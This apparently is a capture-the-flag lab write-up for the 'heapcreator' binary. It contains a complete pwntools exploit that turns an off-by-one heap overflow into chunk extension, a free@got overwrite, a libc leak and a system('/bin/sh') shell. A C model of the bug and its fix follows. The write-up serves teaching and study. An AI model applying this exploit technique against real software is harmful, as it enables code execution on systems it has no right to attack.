Chunk extend: hit training lab13
2022-06-10 18:04:00 【amazh】
64-bit binary, analysed in IDA; it has the usual menu layout (create / edit / show / delete / exit).
Static analysis shows that edit has an off-by-one vulnerability:

Red box (IDA screenshot, not reproduced here): the edit loop reads size + 1 bytes, so one extra byte can be written past the content buffer.
First, the exploit:
from pwn import *

p = process("./heapcreator")
e = ELF("./heapcreator")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.log_level = "debug"

def create(size, content):
    p.recvuntil(b"Your choice :")
    p.sendline(b"1")
    p.recvuntil(b"Size of Heap :")
    p.sendline(str(size).encode())
    p.recvuntil(b"Content of heap:")
    p.sendline(content)

def edit(index, content):
    p.recvuntil(b"Your choice :")
    p.sendline(b"2")
    p.recvuntil(b"Index :")
    p.sendline(str(index).encode())
    p.recvuntil(b"Content of heap :")
    p.sendline(content)
    p.recvline()

def show(index):
    p.recvuntil(b"Your choice :")
    p.sendline(b"3")
    p.recvuntil(b"Index :")
    p.sendline(str(index).encode())

def delete(index):
    p.recvuntil(b":")
    p.sendline(b"4")
    p.recvuntil(b":")
    p.sendline(str(index).encode())

def exit_prog():  # renamed so it does not shadow the builtin exit()
    p.recvuntil(b":")
    p.sendline(b"5")

# heap0: record chunk 0x20 (malloc(0x10)) + content chunk 0x20 (malloc(24) rounds up to 0x20)
create(24, b'amazh')
# heap1: record chunk 0x20 + content chunk 0x20; heap1's record chunk sits right after heap0's content chunk
create(16, b'amazh')
# off-by-one: the 25th byte lands on the low byte of heap1's record-chunk size field (0x21 -> 0x41),
# so that chunk now appears to span both the record and heap1's content chunk (chunk extend)
edit(0, b'/bin/sh\x00' + b'a' * 0x10 + b'\x41')
# delete(1): free(heap1->content) goes to the 0x20 fastbin, free(heap1) puts the extended 0x40 chunk in the 0x40 fastbin
delete(1)
# the new record comes from the 0x20 fastbin (the old heap1 content chunk, at +0x20 inside the 0x40 chunk);
# malloc(0x30) returns the 0x40 chunk as the content buffer, so our content overwrites the record:
#   +0x18 keeps the old content-chunk size 0x21, +0x20 record.size = 0x30, +0x28 record.content = free@got
create(0x30, p64(0) * 3 + p64(0x21) + p64(0x30) + p64(e.got['free']))
# show(1) now prints the 8 bytes at free@got: free's real libc address
show(1)
p.recvuntil(b"Content : ")
data = p.recvuntil(b"Done !")
free_addr = u64(data.split(b"\n")[0].ljust(8, b"\x00"))
log.success('free addr: ' + hex(free_addr))
libc_base = free_addr - libc.symbols['free']
log.success('libc base addr: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
# edit(1) writes through record.content, i.e. straight into free@got
edit(1, p64(system_addr))
# delete(0) calls free(heap0->content), which is now system("/bin/sh")
delete(0)
p.interactive()
Approach:
First create two heaps with content sizes 0x18 and 0x10. Each heap is a record chunk (size plus content pointer, allocated with malloc(0x10), so a 0x20 chunk) followed by its content chunk, which means heap1's record chunk lies immediately after heap0's content chunk. Editing heap0's content overflows one byte into the size field of heap1's record chunk; setting it to 0x41 makes that chunk claim 0x40 bytes and swallow heap1's content chunk as well. That is the extend.
After the extend, free(heap1) releases heap1's content chunk into the 0x20 fastbin and the extended record chunk, now 0x40, into the 0x40 fastbin. The next create takes its record from the 0x20 fastbin (the old content chunk, which sits at offset 0x20 inside the 0x40 chunk) and, for a 0x30 request, gets the 0x40 chunk back as the content buffer, so the content we write becomes the new record: 0x21 at +0x18 keeps the old content-chunk header sane, 0x30 at +0x20 is the record size, and free@got at +0x28 is the content pointer. show(1) then leaks free's real address, which gives the libc base; edit(1) writes system over free@got, and delete(0) calls free on heap0's content "/bin/sh", i.e. system("/bin/sh"), giving an arbitrary write turned into a shell. The sizes and bin behaviour above are for the 64-bit, fastbin-only glibc the lab targets; on a glibc with tcache the freed chunks go into tcache bins instead, so re-check the layout in a debugger before reusing these offsets.
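The two corruptions the exploit relies on, modelled in C as an added example (this is not the lab's source or the author's code): a byte array standing in for heap0's content buffer plus the following chunk header shows where the 25th byte lands, and a second array standing in for the reclaimed 0x40 chunk shows why the payload's fields sit at +0x18, +0x20 and +0x28. The reader functions, the record struct, the offsets and the `fake_got` placeholder are assumptions chosen to mirror the walkthrough's 64-bit glibc layout, and the hardened reader is the obvious fix, not anything the lab ships.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model 1: heap0's content buffer followed by heap1's record-chunk header.
 *   [0x00, 0x18)  heap0 content user data  (malloc(24) -> 0x20 chunk)
 *   [0x18, 0x20)  size field of the NEXT chunk: heap1's record chunk, 0x21
 */
#define CONTENT_SIZE   24
#define NEXT_SIZE_OFF  0x18
#define MODEL_LEN      0x20

/* Mirrors the lab's bug: the edit loop accepts size + 1 bytes. */
static size_t read_input_vuln(unsigned char *dst, size_t size,
                              const unsigned char *src, size_t srclen)
{
    size_t n = 0;
    while (n < size + 1 && n < srclen) { dst[n] = src[n]; n++; } /* off-by-one */
    return n;
}

/* Hardened reader: never more than `size` bytes. */
static size_t read_input_fixed(unsigned char *dst, size_t size,
                               const unsigned char *src, size_t srclen)
{
    size_t n = 0;
    while (n < size && n < srclen) { dst[n] = src[n]; n++; }
    return n;
}

/* Runs the exploit's edit(0, ...) payload through one reader and returns the
 * size field of the following chunk as malloc/free would then read it. */
static uint64_t next_chunk_size_after_edit(int use_fixed)
{
    unsigned char heap[MODEL_LEN];
    uint64_t sz = 0x21;                       /* 0x20 | PREV_INUSE */
    memset(heap, 0, sizeof heap);
    memcpy(heap + NEXT_SIZE_OFF, &sz, sizeof sz);

    /* constructed payload, same shape as edit(0, '/bin/sh\x00' + 'a'*0x10 + '\x41') */
    unsigned char payload[CONTENT_SIZE + 1];
    memcpy(payload, "/bin/sh", 8);            /* 7 chars + NUL */
    memset(payload + 8, 'a', 0x10);
    payload[CONTENT_SIZE] = 0x41;             /* the one extra byte */

    if (use_fixed)
        read_input_fixed(heap, CONTENT_SIZE, payload, sizeof payload);
    else
        read_input_vuln(heap, CONTENT_SIZE, payload, sizeof payload);

    memcpy(&sz, heap + NEXT_SIZE_OFF, sizeof sz);
    return sz;                                /* 0x41 vulnerable, 0x21 fixed */
}

/* Model 2: the reclaimed 0x40 chunk. create(0x30, ...) writes 0x30 bytes into
 * its user area; the new record (malloc(0x10) served from the 0x20 fastbin) is
 * the old heap1 content chunk, whose user data starts at +0x20 of that area. */
struct heap_record { uint64_t size; unsigned char *content; }; /* the lab's record */

static unsigned char fake_got[8];             /* placeholder standing in for free@got */

static int fake_record_points_at(const unsigned char *target)
{
    uint64_t words[6] = {
        0, 0, 0,
        0x21,                                 /* +0x18: old content-chunk size, left intact */
        0x30,                                 /* +0x20: record.size seen by edit/show */
        (uint64_t)(uintptr_t)target           /* +0x28: record.content */
    };
    struct heap_record r;
    memcpy(&r, (unsigned char *)words + 0x20, sizeof r); /* what heapcreator[1] now reads */
    return r.size == 0x30 && r.content == target;
}

int main(void)
{
    printf("next chunk size after vulnerable edit: 0x%llx\n",
           (unsigned long long)next_chunk_size_after_edit(0));
    printf("next chunk size after fixed edit:      0x%llx\n",
           (unsigned long long)next_chunk_size_after_edit(1));
    printf("fake record points at free@got: %d\n", fake_record_points_at(fake_got));
    return 0;
}
```

The first model is the whole bug: the loop bound `size + 1` is the only difference between the two readers, and that one byte is enough to rewrite a neighbouring chunk's size. The second model shows why the payload zeros the first 0x18 bytes and restores 0x21 before the record fields: the bytes at +0x18 are still a live chunk header that glibc will inspect on the next free.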